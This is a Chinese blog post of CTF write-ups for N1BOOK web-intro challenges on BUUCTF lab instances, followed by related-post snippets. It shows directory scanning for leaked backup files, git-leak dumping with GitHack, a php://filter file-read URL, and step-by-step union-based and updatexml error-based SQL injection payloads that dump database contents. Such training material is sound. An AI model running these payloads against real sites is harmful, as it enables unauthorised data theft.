【N1BOOK】[第一章 web入门] wp

最新推荐文章于 2024-03-28 23:26:43 发布
最新推荐文章于 2024-03-28 23:26:43 发布
阅读量4.1k 收藏 17
点赞数 2
分类专栏: CTF 文章标签: web php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/DYJ_628/article/details/110142274
版权
【N1BOOK】[第一章 web入门]常见的搜集 wp打开页面就是这样的我们用扫一下目录得到这三个返回正常robots.txt index.php~ .index.php.swp扫目录工具dirsearch/御剑,这里我用的是dirsearch。我们一个个访问一下,他说flag在/flag1_is_her3_fun.txt,那我们就访问一下得到第一半flag,继续访问 index.php~得到第2半flag,继续访问 .index.php.swp,打开文件发现第3半flag..
摘要由CSDN通过智能技术生成

第一章 web入门]常见的搜集 wp

【N1BOOK】[第一章 web入门]常见的搜集 wp

打开页面就是这样的
在这里插入图片描述
我们用扫一下目录得到这三个返回正常robots.txt index.php~ .index.php.swp
扫目录工具dirsearch/御剑,这里我用的是dirsearch。
我们一个个访问一下,
在这里插入图片描述
他说flag在/flag1_is_her3_fun.txt,那我们就访问一下
在这里插入图片描述
得到第一半flag,继续访问 index.php~
在这里插入图片描述
得到第2半flag,继续访问 .index.php.swp,打开文件
在这里插入图片描述
发现第3半flag,综上就是完整的flag~

【N1BOOK】[第一章 web入门]粗心的小李 wp

考点: git泄露
工具:GitHack
下载地址: https://github.com/WangYihang/GitHacker.git

打开页面是这样的
在这里插入图片描述
使用GitHack,python GitHack.py http://648cad17-6be7-4e3b-a1e8-22f3106df202.node3.buuoj.cn/.git,得到一个index.html
在这里插入图片描述

打开

![在这里插入图片描述](https://img-blog.csdnimg.cn/20201126104419751.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0RZSl82Mjg=,size_16,color_FFFFFF,t_70#pic_ce

【N1BOOK】[第一章 web入门]afr_1 wp)

根据题目我们知道考察的是** php://协议**
php://filter 读取源代码并进行base64编码输出,不然会直接当做php代码执行就看不到源代码内容了。
下面我们构造url,下面是通用格式

http://127.0.0.1/cmd.php?file=php://filter/convert.base64-encode/resource=cmd

那么下面我们这道题的url就是,访问看看

http://ebe70569-0124-4999-bcec-f429d08a0485.node3.buuoj.cn/?p=php://filter/convert.base64-encode/resource=flag

在这里插入图片描述
得到一串base64码,去解开它

在这里插入图片描述
得到flag~
我记得19年的极客大挑战有道题用到了相同的知识点,详细参考 [极客大挑战 2019]Secret File wp~~

【N1BOOK】[第一章 web入门]SQL注入-1 wp

打开页面是这样的,通过url发现请求方式为get

在这里插入图片描述

先注入一个‘发现报错

在这里插入图片描述

确定有sql注入,继续查字段,注入1' order by 1--+返回正常,到1' order by 4--+的时候返回错误,说明字段数为3

在这里插入图片描述

继续查注入点,注入语句-1' union select 1,2,3--+

在这里插入图片描述

发现注入点,继续查库名,注入-1%27%20union%20select%201,2,group_concat(schema_name)%20from%20information_schema.schemata%23

在这里插入图片描述

得到库名,继续查表名,注入-1%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables where table_schema='note'%23

在这里插入图片描述

得到表名,继续查字段,注入-1%27%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns where table_name='fl4g'%23

在这里插入图片描述

得到字段名,继续爆数据,注入-1%27%20union%20select%201,2,group_concat(concat_ws(0x23,fllllag)) from note.fl4g%23

在这里插入图片描述

爆出数据,得到flag~

就是简单的Union注入,比较常规,不难,按部就班就好。

【N1BOOK】[第一章 web入门]afr_2 wp

先来说说知识点吧
原理Nginx错误

最低0.47元/天 解锁文章
DD|NN
关注
  • 2
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
[BUUCTF-N1BOOK]-【信息收集】[第一章 web入门]常见的搜集
羊柳树的博客
11-11 2969
项目场景: 提示:这里简述项目相关背景: 例如:项目场景:示例:通过蓝牙芯片(HC-05)与手机 APP 通信,每隔 5s 传输一批传感器数据(不是很大) 问题描述: 提示:这里描述项目中遇到的问题: 例如:数据传输过程中数据不时出现丢失的情况,偶尔会丢失一部分数据 APP 中接收数据代码: @Override public void run() { bytes = mmInStream.read(buffer); mHandler.obta
[第一章 web入门]信息收集
carrot11223的博客
01-25 705
第一章 web入门]信息收集常见的搜集:使用dirsearch进行目录扫描:http://641b1a56-4c8b-4b60-a33f-7af1a2b236a2.node5.buuoj.cn:81/存在robots.txt文件,该文件中主要用来记录哪些文件可以爬虫,哪些文件不可以爬虫,访问发现:访问泄露的路径发现:直接提交发现有问题:注意看到名称为flag1,估计还存在另一半信息叫flag2?于是我又开始在二级目录下扫描目录,可是仔细看这是个文本文件啊,咋可能文件下还有东西。
BUUCTF--N1BOOK
m0_59022585的博客
07-09 720
尝试注入'and updatexml(1,concat(0x7e,(seLect group_concat(table_name) from information_schema.tables where table_schema='note'),0x7e),1)#将select关键字绕过,成功回显出表(fl4g和users)。注入'and updatexml(1,concat(0x7e,(seLect group_concat(flag) from fl4g),0x7e),1)#回显出flag。
[第一章 web入门]常见的搜集
最新发布
2202_75361164的博客
03-28 774
[信息泄露]]
BUUCTF-N1BOOK(web1)学习分享
m0_63641882的博客
11-17 264
访问.index.php.swp使用记事本打开得到flag3拼接起来就可以了。使用GitHack工具进行访问下载index.html文件。访问得到一个txt文件的路径,访问得到半个flag。使用‘进行测试注入类型,发现有回显得知是字符型注入。在本地访问index.html得到flag。进行目录穿越../得到根目录,得到flag。发现flag字样的表进行查询表内的字段。访问index.php~得到flag2。得到flag字段,进行查询字段值。4.php伪协议的使用,目录穿越。使用php伪协议进行文件读取。
第三章-制作第一个Flash动画2022优秀文档.ppt
11-14
本章主要介绍了如何制作第一个Flash动画,让我们深入探讨一下。\n\n**动画制作的基本流程**\n\n1. **构思动画**:在开始制作前,首先需要清晰地定义动画的主题和创意,明确动画想要传达的信息,并考虑观众的接受度。...
第一场非电机试卷B.doc
11-28
在数组中,数组名实际上是指向第一个元素的指针,如 `fun(a[100], n1, n2)` 实际上传递了数组a的第一个元素的地址。 3. **循环与条件判断** - `for` 循环:如 `for(i=m1; i; i++)` 是一个典型的for循环,用于遍历...
工程光学郁道银第一章部分答案.PDF
10-23
以下是对第一章部分习题答案的详细解析: 1. 光速在不同介质中的计算: 光速在真空中为c = 3 * 10^8 m/s。光在其他介质中的速度可以通过公式v = c / n 计算,其中n是介质的折射率。例如,在水中的光速v = 2.25 * 10...
第三章单片机程序设计优秀文档.ppt
12-03
【第三章 单片机程序设计】\n\n在单片机编程中,主要涉及到两种基本的程序设计语言,即汇编语言和高级语言(如C语言)。汇编语言因其直接对应机器指令,执行效率高,能充分利用硬件资源,但编写起来较为复杂。相反,...
汽车电子技术与单片机第11章.ppt
11-12
【汽车电子技术与单片机第11章】主要探讨的是汽车电子系统中的一种通信协议——LIN(Local Interconnect Network)总线,以及在该总线中应用的TJA1020收发器芯片的技术特性。LIN总线是一种低成本、低速(最高20kbps...
c+cgi+mysql+ajax实现web操作mysql
08-29
完成CGI - MYSQL作业: 实现一个MySQL Web 客户端。 通过浏览器操作MySQL。 页面整体布局如下: MySQL Host: (单行输入框) MySQL Port: (单行输入框) MySQL User: (单行输入框) MySQL Pass: (单行输入框) MySQL DB: (单行输入框) SQL 语句: (单行输入框) 总行数: XXXXX 表格显示SQL 结果。 要求: 输入对应的MYSQL SERVER 信息, 然后回显用户执行的 SQL 语句结果。 结果信息应包含: 总行数、 字段名,以及具体的字段内容。要求使用 AJAX,在不刷新整个页面的情况下,展示结果数据。 如果SQL语句执行出错,应给出具体的出错原因。 密码应用星号显示而非明文显示。
N1BOOK详解
shinygod的博客
10-06 1375
然后上传,访问/zzz.php.zzz就可以了,这样就解析成php了,因为apache是从右到左解析的,遇到不认识的后缀就忽略,继续往前解析,但这个漏洞有版本限制。用户名为admin时,显示账号或密码错误,但用户名不是admin时,显示账号不存在,所以用户名是admin。但是第三步一直成功不了,就尝试用nc直接下载也没成功,不清楚是怎么回事,望大佬告之!两种方式,一种布尔盲注,一种报错注入,也有可能有第三种,user.php没用到。,然后压缩,再用010打开,选择并双击一个start不为0h的。
SSTI模板注入
weixin_42739903的博客
01-10 1417
SSTI 漏洞介绍和一些题目案例演示
i春秋《从0到1:CTFer成长之路》通关WP
07-08 4395
1、常见的搜集 题目内容:一共3部分flag 使用目录扫描工具,如:7kb-webpathbrute对该URL进行扫描: 打开第一个URL: 发现flag文件flag1_is_her3_fun.txt文件,访问即可得到flag1:n1book{info_1 打开第二个URL: 可以得到flag2:s_v3ry_im 打开第3个URL,下载index.php.swp,打开可以得到第3个flag3:p0rtant_hack}: 组合即可得到完整flag:n1book{info_1
web入门:举足轻重的信息搜集
c10udz的博客
04-05 1993
一.举足轻重的信息搜集 1.敏感目录泄露 (1)git泄露 前置要求:VMware、Ubuntu(也可以用centos或者kali)、docker、docker-compose、vim 可自行csdn安装 环境搭建: Ubuntu终端下创建vim docker-compose.yml文件 【需要sudo权限,不然无法成功(;´д`)ゞ,都是泪的总结呀!】 N1BOOK平台-Nu1L Team 从0到1:ctfer官方提供的镜像 复制,shift+ins插入vim,按 est键 .
如何用docker搭建N1BOOK题目的环境
aoao331198的博客
04-05 1938
文章目录前言配置一台CentOS7安装docker和docker-compose编辑docker-compose.yml 前言 在做BUU的N1Book题目的时候,遇到一些题目wp是自己搭建靶机,这样能更好的看到靶机实际的变化,能有更深的理解,于是自己索性也想这样尝试,一干就是小半个晚上<_>!! 配置一台CentOS7 教程 照这个教程基本上没有问题 安装docker和docker-compose 同样的用现有教程 教程 踩了个雷,可能遇到这样问题 解决方法 根据提示在命令结尾加上–allo
CTF---Web---SQL注入---11---注入列的选择与id的值
qq_22160557的博客
08-01 713
文章目录前言一、题目描述二、解题步骤1、尝试列数2、爆表的两种方式3、爆列、字段三、总结 前言 题目分类: CTF—Web—SQL注入—11—注入列的选择与id的值 一、题目描述 题目:SQL注入 二、解题步骤 1、尝试列数 Step1:尝试列数,1 union select 1,2,3,4# 列数为4列 1 union select 1,2,database(),4# 数据库名为:inject_05 2、爆表的两种方式 Step2:爆表 -1 union select 1,(select grou
[第一章 web入门]SQL注入 三种解法
u011250160的博客
12-15 1265
解法一:联合查询 看到这个id=1莫名的就想试试id=2,3,4 index.php?id=1 index.php?id=2 index.php?id=3 id=4的时候就没了 index.php?id=4 查看下tips 如果有能力的话还是自己猜后台的语句 index.php?id=1&tips=1 判断字段个数 当order by 1,2,3没错 当order by 1,2,3,4没显示了 说明这里就是三个字段 然后寻找回显的位置 之前的文章里我也提到过,联合查询会先显示前面
N1BOOK第二关摸鱼:[第一章 web入门]粗心的小李
weixin_45571987的博客
11-30 4026
BUUCTF:[第一章 web入门]粗心的小李在题目中寻找有价值的信息GitHack的下载安装好了该开始用GitHack做题了得到flag 在题目中寻找有价值的信息   题目中提示是Git测试,此时我们可以使用GitHack脚本对其进行测试。 GitHack的下载安装   下载地址:https://github.com/lijiejie/GitHack   点我也行   在GitHub上下载源码的压缩包后解压即可使用   需要使用python2的版本才能正常运行,使用cmd进入到文件夹的路径中   如果要
buuctf n1book
08-23
根据引用、和的信息,buuctf n1book是一个与CTF(Capture The Flag)竞赛相关的主题或者密码。在引用中提到了一个关于SQL注入的话题,引用中提到了关于AES加密和解密的信息,而引用中提到了一个关于佛莱格的密码。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值